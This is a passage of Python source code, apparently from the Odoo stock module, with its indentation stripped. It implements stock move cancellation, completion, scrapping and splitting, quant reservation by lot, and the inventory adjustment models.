quant_obj.quants_reserve(cr, uid, quants, move, context=context)
#force assignation of consumable products and incoming from supplier/inventory/production
# Do not take force_assign as it would create pack operations
if to_assign_moves:
self.write(cr, uid, list(to_assign_moves), {'state': 'assigned'}, context=context)
if not no_prepare:
self.check_recompute_pack_op(cr, uid, ids, context=context)
def action_cancel(self, cr, uid, ids, context=None):
""" Cancels the moves and if all moves are cancelled it cancels the picking.
@return: True
"""
procurement_obj = self.pool.get('procurement.order')
context = context or {}
procs_to_check = set()
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
raise UserError(_('You cannot cancel a stock move that has been set to \'Done\'.'))
if move.reserved_quant_ids:
self.pool.get("stock.quant").quants_unreserve(cr, uid, move, context=context)
if context.get('cancel_procurement'):
if move.propagate:
procurement_ids = procurement_obj.search(cr, uid, [('move_dest_id', '=', move.id)], context=context)
procurement_obj.cancel(cr, uid, procurement_ids, context=context)
else:
if move.move_dest_id:
if move.propagate:
self.action_cancel(cr, uid, [move.move_dest_id.id], context=context)
elif move.move_dest_id.state == 'waiting':
#If waiting, the chain will be broken and we are not sure if we can still wait for it (=> could take from stock instead)
self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
if move.procurement_id:
# Does the same as procurement check, only eliminating a refresh
procs_to_check.add(move.procurement_id.id)
res = self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
if procs_to_check:
procurement_obj.check(cr, uid, list(procs_to_check), context=context)
return res
def _check_package_from_moves(self, cr, uid, ids, context=None):
pack_obj = self.pool.get("stock.quant.package")
packs = set()
for move in self.browse(cr, uid, ids, context=context):
packs |= set([q.package_id for q in move.quant_ids if q.package_id and q.qty > 0])
return pack_obj._check_location_constraint(cr, uid, list(packs), context=context)
def find_move_ancestors(self, cr, uid, move, context=None):
'''Find the first level ancestors of given move '''
ancestors = []
move2 = move
while move2:
ancestors += [x.id for x in move2.move_orig_ids]
#loop on the split_from to find the ancestor of split moves only if the move has not direct ancestor (priority goes to them)
move2 = not move2.move_orig_ids and move2.split_from or False
return ancestors
@api.cr_uid_ids_context
def recalculate_move_state(self, cr, uid, move_ids, context=None):
'''Recompute the state of moves given because their reserved quants were used to fulfill another operation'''
for move in self.browse(cr, uid, move_ids, context=context):
vals = {}
reserved_quant_ids = move.reserved_quant_ids
if len(reserved_quant_ids) > 0 and not move.partially_available:
vals['partially_available'] = True
if len(reserved_quant_ids) == 0 and move.partially_available:
vals['partially_available'] = False
if move.state == 'assigned':
if self.find_move_ancestors(cr, uid, move, context=context):
vals['state'] = 'waiting'
else:
vals['state'] = 'confirmed'
if vals:
self.write(cr, uid, [move.id], vals, context=context)
def _move_quants_by_lot(self, cr, uid, ops, lot_qty, quants_taken, false_quants, lot_move_qty, quant_dest_package_id, context=None):
"""
This function is used to process all the pack operation lots of a pack operation
For every move:
First, we check the quants with lot already reserved (and those are already subtracted from the lots to do)
Then go through all the lots to process:
Add reserved false lots lot by lot
Check if there are not reserved quants or reserved elsewhere with that lot or without lot (with the traditional method)
"""
quant_obj = self.pool['stock.quant']
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', 'not in', [x for x in lot_move_qty.keys()]), ('reservation_id', '!=', False)]
preferred_domain_list = [fallback_domain] + [fallback_domain2]
rounding = ops.product_id.uom_id.rounding
for move in lot_move_qty:
move_quants_dict = {}
move_rec = self.pool['stock.move'].browse(cr, uid, move, context=context)
# Assign quants already reserved with lot to the correct
for quant in quants_taken:
if quant[0] <= move_rec.reserved_quant_ids:
move_quants_dict.setdefault(quant[0].lot_id.id, [])
move_quants_dict[quant[0].lot_id.id] += [quant]
false_quants_move = [x for x in false_quants if x[0].reservation_id.id == move]
for lot in lot_qty:
move_quants_dict.setdefault(lot, [])
redo_false_quants = False
# Take remaining reserved quants with no lot first
# (This will be used mainly when incoming had no lot and you do outgoing with)
while false_quants_move and float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0 and float_compare(lot_move_qty[move], 0, precision_rounding=rounding) > 0:
qty_min = min(lot_qty[lot], lot_move_qty[move])
if false_quants_move[0].qty > qty_min:
move_quants_dict[lot] += [(false_quants_move[0], qty_min)]
qty = qty_min
redo_false_quants = True
else:
qty = false_quants_move[0].qty
move_quants_dict[lot] += [(false_quants_move[0], qty)]
false_quants_move.pop(0)
lot_qty[lot] -= qty
lot_move_qty[move] -= qty
# Search other with first matching lots and then without lots
if float_compare(lot_move_qty[move], 0, precision_rounding=rounding) > 0 and float_compare(lot_qty[lot], 0, precision_rounding=rounding) > 0:
# Search if we can find quants with that lot
domain = [('qty', '>', 0)]
qty = min(lot_qty[lot], lot_move_qty[move])
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move_rec, ops=ops, lot_id=lot, domain=domain,
preferred_domain_list=preferred_domain_list, context=context)
move_quants_dict[lot] += quants
lot_qty[lot] -= qty
lot_move_qty[move] -= qty
#Move all the quants related to that lot/move
if move_quants_dict[lot]:
quant_obj.quants_move(cr, uid, move_quants_dict[lot], move_rec, ops.location_dest_id, location_from=ops.location_id,
lot_id=lot, owner_id=ops.owner_id.id, src_package_id=ops.package_id.id,
dest_package_id=quant_dest_package_id, context=context)
if redo_false_quants:
move_rec = self.pool['stock.move'].browse(cr, uid, move, context=context)
false_quants_move = [x for x in move_rec.reserved_quant_ids if (not x.lot_id) and (x.owner_id.id == ops.owner_id.id) \
and (x.location_id.id == ops.location_id.id) and (x.package_id.id == ops.package_id.id)]
def action_done(self, cr, uid, ids, context=None):
""" Process completely the moves given as ids and if all moves are done, it will finish the picking.
"""
context = context or {}
picking_obj = self.pool.get("stock.picking")
quant_obj = self.pool.get("stock.quant")
uom_obj = self.pool.get("product.uom")
todo = [move.id for move in self.browse(cr, uid, ids, context=context) if move.state == "draft"]
if todo:
ids = self.action_confirm(cr, uid, todo, context=context)
pickings = set()
procurement_ids = set()
#Search operations that are linked to the moves
operations = set()
move_qty = {}
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id:
pickings.add(move.picking_id.id)
move_qty[move.id] = move.product_qty
for link in move.linked_move_operation_ids:
operations.add(link.operation_id)
#Sort operations according to entire packages first, then package + lot, package only, lot only
operations = list(operations)
operations.sort(key=lambda x: ((x.package_id and not x.product_id) and -4 or 0) + (x.package_id and -2 or 0) + (x.pack_lot_ids and -1 or 0))
for ops in operations:
if ops.picking_id:
pickings.add(ops.picking_id.id)
entire_pack=False
if ops.product_id:
#If a product is given, the result is always put immediately in the result package (if it is False, they are without package)
quant_dest_package_id = ops.result_package_id.id
else:
# When a pack is moved entirely, the quants should not be written anything for the destination package
quant_dest_package_id = False
entire_pack=True
lot_qty = {}
tot_qty = 0.0
for pack_lot in ops.pack_lot_ids:
qty = uom_obj._compute_qty(cr, uid, ops.product_uom_id.id, pack_lot.qty, ops.product_id.uom_id.id)
lot_qty[pack_lot.lot_id.id] = qty
tot_qty += pack_lot.qty
if ops.pack_lot_ids and ops.product_id and float_compare(tot_qty, ops.product_qty, precision_rounding=ops.product_uom_id.rounding) != 0.0:
raise UserError(_('You have a difference between the quantity on the operation and the quantities specified for the lots. '))
quants_taken = []
false_quants = []
lot_move_qty = {}
#Group links by move first
move_qty_ops = {}
for record in ops.linked_move_operation_ids:
move = record.move_id
if not move_qty_ops.get(move):
move_qty_ops[move] = record.qty
else:
move_qty_ops[move] += record.qty
#Process every move only once for every pack operation
for move in move_qty_ops:
main_domain = [('qty', '>', 0)]
self.check_tracking(cr, uid, move, ops, context=context)
preferred_domain = [('reservation_id', '=', move.id)]
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', '!=', move.id), ('reservation_id', '!=', False)]
if not ops.pack_lot_ids:
preferred_domain_list = [preferred_domain] + [fallback_domain] + [fallback_domain2]
quants = quant_obj.quants_get_preferred_domain(cr, uid, move_qty_ops[move], move, ops=ops, domain=main_domain,
preferred_domain_list=preferred_domain_list, context=context)
quant_obj.quants_move(cr, uid, quants, move, ops.location_dest_id, location_from=ops.location_id,
lot_id=False, owner_id=ops.owner_id.id, src_package_id=ops.package_id.id,
dest_package_id=quant_dest_package_id, entire_pack=entire_pack, context=context)
else:
# Check what you can do with reserved quants already
qty_on_link = move_qty_ops[move]
rounding = ops.product_id.uom_id.rounding
for reserved_quant in move.reserved_quant_ids:
if (reserved_quant.owner_id.id != ops.owner_id.id) or (reserved_quant.location_id.id != ops.location_id.id) or \
(reserved_quant.package_id.id != ops.package_id.id):
continue
if not reserved_quant.lot_id:
false_quants += [reserved_quant]
elif float_compare(lot_qty.get(reserved_quant.lot_id.id, 0), 0, precision_rounding=rounding) > 0:
if float_compare(lot_qty[reserved_quant.lot_id.id], reserved_quant.qty, precision_rounding=rounding) >= 0:
lot_qty[reserved_quant.lot_id.id] -= reserved_quant.qty
quants_taken += [(reserved_quant, reserved_quant.qty)]
qty_on_link -= reserved_quant.qty
else:
quants_taken += [(reserved_quant, lot_qty[reserved_quant.lot_id.id])]
lot_qty[reserved_quant.lot_id.id] = 0
qty_on_link -= lot_qty[reserved_quant.lot_id.id]
lot_move_qty[move.id] = qty_on_link
if not move_qty.get(move.id):
raise UserError(_("The roundings of your Unit of Measures %s on the move vs. %s on the product don't allow to do these operations or you are not transferring the picking at once. ") % (move.product_uom.name, move.product_id.uom_id.name))
move_qty[move.id] -= move_qty_ops[move]
#Handle lots separately
if ops.pack_lot_ids:
self._move_quants_by_lot(cr, uid, ops, lot_qty, quants_taken, false_quants, lot_move_qty, quant_dest_package_id, context=context)
# Handle pack in pack
if not ops.product_id and ops.package_id and ops.result_package_id.id != ops.package_id.parent_id.id:
self.pool.get('stock.quant.package').write(cr, SUPERUSER_ID, [ops.package_id.id], {'parent_id': ops.result_package_id.id}, context=context)
#Check for remaining qtys and unreserve/check move_dest_id in
move_dest_ids = set()
for move in self.browse(cr, uid, ids, context=context):
move_qty_cmp = float_compare(move_qty[move.id], 0, precision_rounding=move.product_id.uom_id.rounding)
if move_qty_cmp > 0: # (=In case no pack operations in picking)
main_domain = [('qty', '>', 0)]
preferred_domain = [('reservation_id', '=', move.id)]
fallback_domain = [('reservation_id', '=', False)]
fallback_domain2 = ['&', ('reservation_id', '!=', move.id), ('reservation_id', '!=', False)]
preferred_domain_list = [preferred_domain] + [fallback_domain] + [fallback_domain2]
self.check_tracking(cr, uid, move, False, context=context)
qty = move_qty[move.id]
quants = quant_obj.quants_get_preferred_domain(cr, uid, qty, move, domain=main_domain, preferred_domain_list=preferred_domain_list, context=context)
quant_obj.quants_move(cr, uid, quants, move, move.location_dest_id, lot_id=move.restrict_lot_id.id, owner_id=move.restrict_partner_id.id, context=context)
# If the move has a destination, add it to the list to reserve
if move.move_dest_id and move.move_dest_id.state in ('waiting', 'confirmed'):
move_dest_ids.add(move.move_dest_id.id)
if move.procurement_id:
procurement_ids.add(move.procurement_id.id)
#unreserve the quants and make them available for other operations/moves
quant_obj.quants_unreserve(cr, uid, move, context=context)
# Check the packages have been placed in the correct locations
self._check_package_from_moves(cr, uid, ids, context=context)
#set the move as done
self.write(cr, uid, ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
self.pool.get('procurement.order').check(cr, uid, list(procurement_ids), context=context)
#assign destination moves
if move_dest_ids:
self.action_assign(cr, uid, list(move_dest_ids), context=context)
#check picking state to set the date_done is needed
done_picking = []
for picking in picking_obj.browse(cr, uid, list(pickings), context=context):
if picking.state == 'done' and not picking.date_done:
done_picking.append(picking.id)
if done_picking:
picking_obj.write(cr, uid, done_picking, {'date_done': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
return True
def unlink(self, cr, uid, ids, context=None):
context = context or {}
for move in self.browse(cr, uid, ids, context=context):
if move.state not in ('draft', 'cancel'):
raise UserError(_('You can only delete draft moves.'))
return super(stock_move, self).unlink(cr, uid, ids, context=context)
def action_scrap(self, cr, uid, ids, quantity, location_id, restrict_lot_id=False, restrict_partner_id=False, context=None):
""" Move the scrap/damaged product into scrap location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be scrapped
@param quantity : specify scrap qty
@param location_id : specify scrap location
@param context: context arguments
@return: Scraped lines
"""
quant_obj = self.pool.get("stock.quant")
#quantity should be given in MOVE UOM
if quantity <= 0:
raise UserError(_('Please provide a positive quantity to scrap.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
source_location = move.location_id
if move.state == 'done':
source_location = move.location_dest_id
#Previously used to prevent scraping from virtual location but not necessary anymore
#if source_location.usage != 'internal':
#restrict to scrap from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
#raise UserError(_('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
move_qty = move.product_qty
default_val = {
'location_id': source_location.id,
'product_uom_qty': quantity,
'state': move.state,
'scrapped': True,
'location_dest_id': location_id,
'restrict_lot_id': restrict_lot_id,
'restrict_partner_id': restrict_partner_id,
}
new_move = self.copy(cr, uid, move.id, default_val)
res += [new_move]
product_obj = self.pool.get('product.product')
for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
if move.picking_id:
uom = product.uom_id.name if product.uom_id else ''
message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
move.picking_id.message_post(body=message)
# We "flag" the quant from which we want to scrap the products. To do so:
# - we select the quants related to the move we scrap from
# - we reserve the quants with the scrapped move
# See self.action_done, et particularly how is defined the "preferred_domain" for clarification
scrap_move = self.browse(cr, uid, new_move, context=context)
if move.state == 'done' and scrap_move.location_id.usage not in ('supplier', 'inventory', 'production'):
domain = [('qty', '>', 0), ('history_ids', 'in', [move.id])]
# We use scrap_move data since a reservation makes sense for a move not already done
quants = quant_obj.quants_get_preferred_domain(cr, uid, quantity, scrap_move, domain=domain, context=context)
quant_obj.quants_reserve(cr, uid, quants, scrap_move, context=context)
self.action_done(cr, uid, res, context=context)
return res
def split(self, cr, uid, move, qty, restrict_lot_id=False, restrict_partner_id=False, context=None):
""" Splits qty from move move into a new move
:param move: browse record
:param qty: float. quantity to split (given in product UoM)
:param restrict_lot_id: optional production lot that can be given in order to force the new move to restrict its choice of quants to this lot.
:param restrict_partner_id: optional partner that can be given in order to force the new move to restrict its choice of quants to the ones belonging to this partner.
:param context: dictionay. can contains the special key 'source_location_id' in order to force the source location when copying the move
returns the ID of the backorder move created
"""
if move.state in ('done', 'cancel'):
raise UserError(_('You cannot split a move done'))
if move.state == 'draft':
#we restrict the split of a draft move because if not confirmed yet, it may be replaced by several other moves in
#case of phantom bom (with mrp module). And we don't want to deal with this complexity by copying the product that will explode.
raise UserError(_('You cannot split a draft move. It needs to be confirmed first.'))
if move.product_qty <= qty or qty == 0:
return move.id
uom_obj = self.pool.get('product.uom')
context = context or {}
#HALF-UP rounding as only rounding errors will be because of propagation of error from default UoM
uom_qty = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, qty, move.product_uom, rounding_method='HALF-UP', context=context)
defaults = {
'product_uom_qty': uom_qty,
'procure_method': 'make_to_stock',
'restrict_lot_id': restrict_lot_id,
'split_from': move.id,
'procurement_id': move.procurement_id.id,
'move_dest_id': move.move_dest_id.id,
'origin_returned_move_id': move.origin_returned_move_id.id,
}
if restrict_partner_id:
defaults['restrict_partner_id'] = restrict_partner_id
if context.get('source_location_id'):
defaults['location_id'] = context['source_location_id']
new_move = self.copy(cr, uid, move.id, defaults, context=context)
ctx = context.copy()
ctx['do_not_propagate'] = True
self.write(cr, uid, [move.id], {
'product_uom_qty': move.product_uom_qty - uom_qty,
}, context=ctx)
if move.move_dest_id and move.propagate and move.move_dest_id.state not in ('done', 'cancel'):
new_move_prop = self.split(cr, uid, move.move_dest_id, qty, context=context)
self.write(cr, uid, [new_move], {'move_dest_id': new_move_prop}, context=context)
#returning the first element of list returned by action_confirm is ok because we checked it wouldn't be exploded (and
#thus the result of action_confirm should always be a list of 1 element length)
return self.action_confirm(cr, uid, [new_move], context=context)[0]
def get_code_from_locs(self, cr, uid, move, location_id=False, location_dest_id=False, context=None):
"""
Returns the code the picking type should have. This can easily be used
to check if a move is internal or not
move, location_id and location_dest_id are browse records
"""
code = 'internal'
src_loc = location_id or move.location_id
dest_loc = location_dest_id or move.location_dest_id
if src_loc.usage == 'internal' and dest_loc.usage != 'internal':
code = 'outgoing'
if src_loc.usage != 'internal' and dest_loc.usage == 'internal':
code = 'incoming'
return code
def show_picking(self, cr, uid, ids, context=None):
assert len(ids) > 0
picking_id = self.browse(cr, uid, ids[0], context=context).picking_id.id
if picking_id:
data_obj = self.pool['ir.model.data']
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_picking_form')
return {
'name': _('Transfer'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.picking',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': picking_id,
}
class stock_inventory(osv.osv):
_name = "stock.inventory"
_description = "Inventory"
def _get_move_ids_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for inv in self.browse(cr, uid, ids, context=context):
res[inv.id] = False
if inv.move_ids:
res[inv.id] = True
return res
def _get_available_filters(self, cr, uid, context=None):
"""
This function will return the list of filter allowed according to the options checked
in 'Settings\Warehouse'.
:rtype: list of tuple
"""
#default available choices
res_filter = [('none', _('All products')), ('partial', _('Select products manually')), ('product', _('One product only'))]
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_tracking_owner'):
res_filter.append(('owner', _('One owner only')))
res_filter.append(('product_owner', _('One product for a specific owner')))
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_production_lot'):
res_filter.append(('lot', _('One Lot/Serial Number')))
if self.pool.get('res.users').has_group(cr, uid, 'stock.group_tracking_lot'):
res_filter.append(('pack', _('A Pack')))
return res_filter
def _get_total_qty(self, cr, uid, ids, field_name, args, context=None):
res = {}
for inv in self.browse(cr, uid, ids, context=context):
res[inv.id] = sum([x.product_qty for x in inv.line_ids])
return res
INVENTORY_STATE_SELECTION = [
('draft', 'Draft'),
('cancel', 'Cancelled'),
('confirm', 'In Progress'),
('done', 'Validated'),
]
_columns = {
'name': fields.char('Inventory Reference', required=True, readonly=True, states={'draft': [('readonly', False)]}, help="Inventory Name."),
'date': fields.datetime('Inventory Date', required=True, readonly=True, help="The date that will be used for the stock level check of the products and the validation of the stock move related to this inventory."),
'line_ids': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=False, states={'done': [('readonly', True)]}, help="Inventory Lines.", copy=True),
'move_ids': fields.one2many('stock.move', 'inventory_id', 'Created Moves', help="Inventory Moves.", states={'done': [('readonly', True)]}),
'state': fields.selection(INVENTORY_STATE_SELECTION, 'Status', readonly=True, select=True, copy=False),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft': [('readonly', False)]}),
'location_id': fields.many2one('stock.location', 'Inventoried Location', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_id': fields.many2one('product.product', 'Inventoried Product', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Product to focus your inventory on a particular Product."),
'package_id': fields.many2one('stock.quant.package', 'Inventoried Pack', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Pack to focus your inventory on a particular Pack."),
'partner_id': fields.many2one('res.partner', 'Inventoried Owner', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Owner to focus your inventory on a particular Owner."),
'lot_id': fields.many2one('stock.production.lot', 'Inventoried Lot/Serial Number', readonly=True, states={'draft': [('readonly', False)]}, help="Specify Lot/Serial Number to focus your inventory on a particular Lot/Serial Number.", copy=False),
# technical field for attrs in view
'move_ids_exist': fields.function(_get_move_ids_exist, type='boolean', string='Has Stock Moves', help='Check the existance of stock moves linked to this inventory'),
'filter': fields.selection(_get_available_filters, 'Inventory of', required=True,
help="If you do an entire inventory, you can choose 'All Products' and it will prefill the inventory with the current stock. If you only do some products "\
"(e.g. Cycle Counting) you can choose 'Manual Selection of Products' and the system won't propose anything. You can also let the "\
"system propose for a single product / lot /... "),
'total_qty': fields.function(_get_total_qty, type="float"),
}
def _default_stock_location(self, cr, uid, context=None):
try:
warehouse = self.pool.get('ir.model.data').get_object(cr, uid, 'stock', 'warehouse0')
return warehouse.lot_stock_id.id
except:
return False
_defaults = {
'date': fields.datetime.now,
'state': 'draft',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'location_id': _default_stock_location,
'filter': 'none',
}
@api.onchange('location_id')
def onchange_location_id(self):
if self.location_id.company_id:
self.company_id = self.location_id.company_id
def reset_real_qty(self, cr, uid, ids, context=None):
inventory = self.browse(cr, uid, ids[0], context=context)
line_ids = [line.id for line in inventory.line_ids]
self.pool.get('stock.inventory.line').write(cr, uid, line_ids, {'product_qty': 0})
return True
def action_done(self, cr, uid, ids, context=None):
""" Finish the inventory
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
for inventory_line in inv.line_ids:
if inventory_line.product_qty < 0 and inventory_line.product_qty != inventory_line.theoretical_qty:
raise UserError(_('You cannot set a negative product quantity in an inventory line:\n\t%s - qty: %s') % (inventory_line.product_id.name, inventory_line.product_qty))
self.action_check(cr, uid, [inv.id], context=context)
self.write(cr, uid, [inv.id], {'state': 'done'}, context=context)
self.post_inventory(cr, uid, inv, context=context)
return True
def post_inventory(self, cr, uid, inv, context=None):
#The inventory is posted as a single step which means quants cannot be moved from an internal location to another using an inventory
#as they will be moved to inventory loss, and other quants will be created to the encoded quant location. This is a normal behavior
#as quants cannot be reuse from inventory location (users can still manually move the products before/after the inventory if they want).
move_obj = self.pool.get('stock.move')
move_obj.action_done(cr, uid, [x.id for x in inv.move_ids if x.state != 'done'], context=context)
def action_check(self, cr, uid, ids, context=None):
""" Checks the inventory and computes the stock move to do
@return: True
"""
inventory_line_obj = self.pool.get('stock.inventory.line')
stock_move_obj = self.pool.get('stock.move')
for inventory in self.browse(cr, uid, ids, context=context):
#first remove the existing stock moves linked to this inventory
move_ids = [move.id for move in inventory.move_ids]
stock_move_obj.unlink(cr, uid, move_ids, context=context)
for line in inventory.line_ids:
#compare the checked quantities on inventory lines to the theorical one
stock_move = inventory_line_obj._resolve_inventory_line(cr, uid, line, context=context)
def action_cancel_draft(self, cr, uid, ids, context=None):
""" Cancels the stock move and change inventory state to draft.
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [inv.id], {'line_ids': [(5,)]}, context=context)
self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state': 'draft'}, context=context)
return True
def action_cancel_inventory(self, cr, uid, ids, context=None):
self.action_cancel_draft(cr, uid, ids, context=context)
def prepare_inventory(self, cr, uid, ids, context=None):
inventory_line_obj = self.pool.get('stock.inventory.line')
for inventory in self.browse(cr, uid, ids, context=context):
# If there are inventory lines already (e.g. from import), respect those and set their theoretical qty
line_ids = [line.id for line in inventory.line_ids]
if not line_ids and inventory.filter != 'partial':
#compute the inventory lines and create them
vals = self._get_inventory_lines(cr, uid, inventory, context=context)
for product_line in vals:
inventory_line_obj.create(cr, uid, product_line, context=context)
return self.write(cr, uid, ids, {'state': 'confirm', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})
def _get_inventory_lines(self, cr, uid, inventory, context=None):
location_obj = self.pool.get('stock.location')
product_obj = self.pool.get('product.product')
location_ids = location_obj.search(cr, uid, [('id', 'child_of', [inventory.location_id.id])], context=context)
domain = ' location_id in %s'
args = (tuple(location_ids),)
if inventory.company_id.id:
domain += ' and company_id = %s'
args += (inventory.company_id.id,)
if inventory.partner_id:
domain += ' and owner_id = %s'
args += (inventory.partner_id.id,)
if inventory.lot_id:
domain += ' and lot_id = %s'
args += (inventory.lot_id.id,)
if inventory.product_id:
domain += ' and product_id = %s'
args += (inventory.product_id.id,)
if inventory.package_id:
domain += ' and package_id = %s'
args += (inventory.package_id.id,)
cr.execute('''
SELECT product_id, sum(qty) as product_qty, location_id, lot_id as prod_lot_id, package_id, owner_id as partner_id
FROM stock_quant WHERE''' + domain + '''
GROUP BY product_id, location_id, lot_id, package_id, partner_id
''', args)
vals = []
for product_line in cr.dictfetchall():
#replace the None the dictionary by False, because falsy values are tested later on
for key, value in product_line.items():
if not value:
product_line[key] = False
product_line['inventory_id'] = inventory.id
product_line['theoretical_qty'] = product_line['product_qty']
if product_line['product_id']:
product = product_obj.browse(cr, uid, product_line['product_id'], context=context)
product_line['product_uom_id'] = product.uom_id.id
vals.append(product_line)
return vals
def _check_filter_product(self, cr, uid, ids, context=None):
for inventory in self.browse(cr, uid, ids, context=context):
if inventory.filter == 'none' and inventory.product_id and inventory.location_id and inventory.lot_id:
return True
if inventory.filter not in ('product', 'product_owner') and inventory.product_id:
return False
if inventory.filter != 'lot' and inventory.lot_id:
return False
if inventory.filter not in ('owner', 'product_owner') and inventory.partner_id:
return False
if inventory.filter != 'pack' and inventory.package_id:
return False
return True
def onchange_filter(self, cr, uid, ids, filter, context=None):
to_clean = { 'value': {} }
if filter not in ('product', 'product_owner'):
to_clean['value']['product_id'] = False
if filter != 'lot':
to_clean['value']['lot_id'] = False
if filter not in ('owner', 'product_owner'):
to_clean['value']['partner_id'] = False
if filter != 'pack':
to_clean['value']['package_id'] = False
return to_clean
_constraints = [
(_check_filter_product, 'The selected inventory options are not coherent.',
['filter', 'product_id', 'lot_id', 'partner_id', 'package_id']),
]
class stock_inventory_line(osv.osv):
_name = "stock.inventory.line"
_description = "Inventory Line"
_order = "inventory_id, location_name, product_code, product_name, prodlot_name"
def _get_product_name_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('product_id', 'in', ids)], context=context)
def _get_location_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('location_id', 'in', ids)], context=context)
def _get_prodlot_change(self, cr, uid, ids, context=None):
return self.pool.get('stock.inventory.line').search(cr, uid, [('prod_lot_id', 'in', ids)], context=context)
def _get_theoretical_qty(self, cr, uid, ids, name, args, context=None):
res = {}
quant_obj = self.pool["stock.quant"]
uom_obj = self.pool["product.uom"]
for line in self.browse(cr, uid, ids, context=context):
quant_ids = self._get_quants(cr, uid, line, context=context)
quants = quant_obj.browse(cr, uid, quant_ids, context=context)
tot_qty = sum([x.qty for x in quants])
if line.product_uom_id and line.product_id.uom_id.id != line.product_uom_id.id:
tot_qty = uom_obj._compute_qty_obj(cr, uid, line.product_id.uom_id, tot_qty, line.product_uom_id, context=context)
res[line.id] = tot_qty
return res
_columns = {
'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True, select=True),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
'package_id': fields.many2one('stock.quant.package', 'Pack', select=True),
'product_uom_id': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
'product_qty': fields.float('Checked Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'company_id': fields.related('inventory_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, select=True, readonly=True),
'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
'state': fields.related('inventory_id', 'state', type='char', string='Status', readonly=True),
'theoretical_qty': fields.function(_get_theoretical_qty, type='float', digits_compute=dp.get_precision('Product Unit of Measure'),
store={'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['location_id', 'product_id', 'package_id', 'product_uom_id', 'company_id', 'prod_lot_id', 'partner_id'], 20),},
readonly=True, string="Theoretical Quantity"),
'partner_id': fields.many2one('res.partner', 'Owner'),
'product_name': fields.related('product_id', 'name', type='char', string='Product Name', store={
'product.product': (_get_product_name_change, ['name', 'default_code'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['product_id'], 20),}),
'product_code': fields.related('product_id', 'default_code', type='char', string='Product Code', store={
'product.product': (_get_product_name_change, ['name', 'default_code'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['product_id'], 20),}),
'location_name': fields.related('location_id', 'complete_name', type='char', string='Location Name', store={
'stock.location': (_get_location_change, ['name', 'location_id', 'active'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['location_id'], 20),}),
'prodlot_name': fields.related('prod_lot_id', 'name', type='char', string='Serial Number Name', store={
'stock.production.lot': (_get_prodlot_change, ['name'], 20),
'stock.inventory.line': (lambda self, cr, uid, ids, c={}: ids, ['prod_lot_id'], 20),}),
}
_defaults = {
'product_qty': 0,
'product_uom_id': lambda self, cr, uid, ctx=None: self.pool['ir.model.data'].get_object_reference(cr, uid, 'product', 'product_uom_unit')[1]
}
def create(self, cr, uid, values, context=None):
product_obj = self.pool.get('product.product')
dom = [('product_id', '=', values.get('product_id')), ('inventory_id.state', '=', 'confirm'),
('location_id', '=', values.get('location_id')), ('partner_id', '=', values.get('partner_id')),
('package_id', '=', values.get('package_id')), ('prod_lot_id', '=', values.get('prod_lot_id'))]
res = self.search(cr, uid, dom, context=context)
if res:
location = self.pool['stock.location'].browse(cr, uid, values.get('location_id'), context=context)
product = product_obj.browse(cr, uid, values.get('product_id'), context=context)
raise UserError(_("You cannot have two inventory adjustements in state 'in Progess' with the same product(%s), same location(%s), same package, same owner and same lot. Please first validate the first inventory adjustement with this product before creating another one.") % (product.name, location.name))
if 'product_id' in values and not 'product_uom_id' in values:
values['product_uom_id'] = product_obj.browse(cr, uid, values.get('product_id'), context=context).uom_id.id
return super(stock_inventory_line, self).create(cr, uid, values, context=context)
def _get_quants(self, cr, uid, line, context=None):
quant_obj = self.pool["stock.quant"]
